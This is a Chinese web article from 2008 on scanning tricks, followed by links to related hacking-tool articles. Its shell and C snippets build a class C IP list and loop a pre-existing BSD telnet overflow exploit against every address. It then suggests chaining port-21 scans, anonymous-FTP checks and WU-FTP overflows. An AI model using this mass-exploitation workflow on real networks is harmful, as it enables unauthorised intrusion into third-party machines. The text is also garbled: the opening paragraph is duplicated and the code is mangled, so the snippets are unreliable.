關(guān)于掃描的技巧與實(shí)戰(zhàn)
互聯(lián)網(wǎng) 發(fā)布時(shí)間:2008-10-08 22:12:23 作者:佚名
我要評(píng)論

面我們就以一個(gè)簡(jiǎn)單的掃描一個(gè)C類IP里BSDTELNET漏洞機(jī)器為例子來(lái)看看:$cat num.cmain(){ int x; for (x=0;x<256;x ) printf ("%dn",x);}上面這段C我想不用我多說(shuō)了吧,他生成一個(gè)C類網(wǎng)的網(wǎng)絡(luò)號(hào),大家在編譯后可以./num >>num.txt來(lái)得到這
面我們就以一個(gè)簡(jiǎn)單的掃描一個(gè)C類IP里BSDTELNET漏洞機(jī)器為例子來(lái)看看:$cat num.cmain(){ int x; for (x=0;x<256;x ) printf ("%d\n",x);}上面這段C我想不用我多說(shuō)了吧,他生成一個(gè)C類網(wǎng)的網(wǎng)絡(luò)號(hào),大家在編譯后可以./num >>num.txt來(lái)得到這個(gè)文本.#!/bin/sh echo -n "please ernter a ip:" read ipip list=`cat num.txt` for listip in $list do echo $ipip.$listipecho >>iplist.txt $ipip.$listip done上面這段我們來(lái)說(shuō)說(shuō),read ipip是接受鍵盤的信息,用來(lái)給你輸入1.1.1這樣一個(gè)C段地址以便與下面的LISTIP合并成真正的ip,list='cat num.txt'是讀取我們剛才生成的num.txt里1-254的網(wǎng)絡(luò)號(hào),for listip in $list是把剛才list里的num.txt內(nèi)容循環(huán)讀給listip,然后我們用echo $ipip.$listip就可以得到一個(gè)真正的ip了,再通過(guò)echo >>iplist.txt $ipip.$listip把最后得到的IP寫到iplist.txt.通過(guò)以上步驟,我們得到了一個(gè)c類ip,下面我們就來(lái)用我們事先就有的bsdtelnet溢出代碼來(lái)掃描他們了,如下:#!/bin/sh list=`cat iplist.txt` for listip in $list do ./bsdtelnet -c $listipdonelist='cat iplist.txt'讀取剛才我們生成的iplist.txt文本,for listip in $list把list里存放的ip循環(huán)送給listip, 看這個(gè)./bsdtelnet -c $listip,這個(gè)就是調(diào)用我們?cè)诋?dāng)前這個(gè)SHELL所在的目錄執(zhí)行我們的exploit來(lái)對(duì)ip進(jìn)行探測(cè).全部結(jié)束,好了,細(xì)心的朋友可能發(fā)現(xiàn)了,這樣的掃描似乎很慢,呵呵,確實(shí),因?yàn)檫@樣他不管23端口有沒有開,不管對(duì)方機(jī)器是不是BSD的,他都要去溢出試試,在這里,我只是通過(guò)TOMYCHEN兄提供給大家一個(gè)巧妙利用SHELL的思路,具體大家可以自己發(fā)揮,比如先在SHELL里調(diào)用掃描器掃描,然后把開放有21端口的機(jī)器保存下面,然后再對(duì)開了21端口的機(jī)器進(jìn)行驗(yàn)證看是否可匿名,得到會(huì)話返回消息,如果是WU-FTP260等,就可以再調(diào)用溢出程序進(jìn)行測(cè)試呀等等.還是那句老話,技術(shù)最重要!----------------------------------------------- 作者:SysHunter
相關(guān)文章
SQLMap簡(jiǎn)介及簡(jiǎn)單應(yīng)用實(shí)例圖文詳解
一個(gè)自動(dòng)化的SQL注入工具,其主要功能是掃描、發(fā)現(xiàn)并利用給定URL的SQL注入漏洞,內(nèi)置了很多繞過(guò)插件,支持的數(shù)據(jù)庫(kù)是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server2023-02-04- Nmap是一款網(wǎng)絡(luò)掃描和主機(jī)檢測(cè)的非常有用的工具。Nmap是不局限于僅僅收集信息和枚舉,同時(shí)可以用來(lái)作為一個(gè)漏洞探測(cè)器或安全掃描器。它可以適用于winodws,linux,mac等操作2019-03-16
SQLMAP注入檢查方法 11種常見SQLMAP使用方法詳解
sqlmap也是滲透中常用的一個(gè)注入工具,其實(shí)在注入工具方面,很多人都是通過(guò)這個(gè)工具實(shí)施的檢測(cè)與注入,對(duì)于我們從事安全防御的人來(lái)說(shuō),一定要引起注意,一般的程序員寫的代2018-08-16- 這篇文章主要介紹了lcx用法之心得總結(jié),需要的朋友可以參考下2017-09-06
lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢(shì))
這篇文章主要介紹了lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢(shì)),需要的朋友可以參考下2017-09-06Nmap備忘單 從探索到漏洞利用 第四章 繞過(guò)防火墻
這是我們的Nmap備忘單的第四部分,本文中我們將討論更多東西關(guān)于掃描防火墻,IDS / IPS 逃逸,Web服務(wù)器滲透測(cè)試等。在此之前,我們應(yīng)該了解一下防火墻的一些基礎(chǔ)知識(shí)以便2016-12-27- 眾所周知NMAP是經(jīng)常用來(lái)進(jìn)行端口發(fā)現(xiàn)、端口識(shí)別。除此之外我們還可以通過(guò)NMAP的NSE腳本做很多事情,比如郵件指紋識(shí)別,檢索WHOIS記錄,使用UDP服務(wù)等2016-12-27
- 這是我們的第二期NMAP備忘單,基本上,我們將討論一些高級(jí)NMAP掃描的技術(shù),我們將進(jìn)行一個(gè)中間人攻擊(MITM)?,F(xiàn)在,游戲開始了2016-12-27
- nmap是一個(gè)網(wǎng)絡(luò)連接端掃描軟件,用來(lái)掃描網(wǎng)上電腦開放的網(wǎng)絡(luò)連接端。確定哪些服務(wù)運(yùn)行在哪些連接端,并且推斷計(jì)算機(jī)運(yùn)行哪個(gè)操作系統(tǒng)(這是亦稱 fingerprinting)。它是網(wǎng)2016-12-27
網(wǎng)絡(luò)漏洞掃描工具Acunetix Web Vulnerability Scanner(AWVS)使用介紹
Acunetix Web Vulnerability Scanner(簡(jiǎn)稱AWVS)是一款知名的網(wǎng)絡(luò)漏洞掃描工具,它通過(guò)網(wǎng)絡(luò)爬蟲測(cè)試你的網(wǎng)站安全,檢測(cè)流行安全漏洞。倫敦時(shí)間2015年6月24日,官方發(fā)布了2016-09-28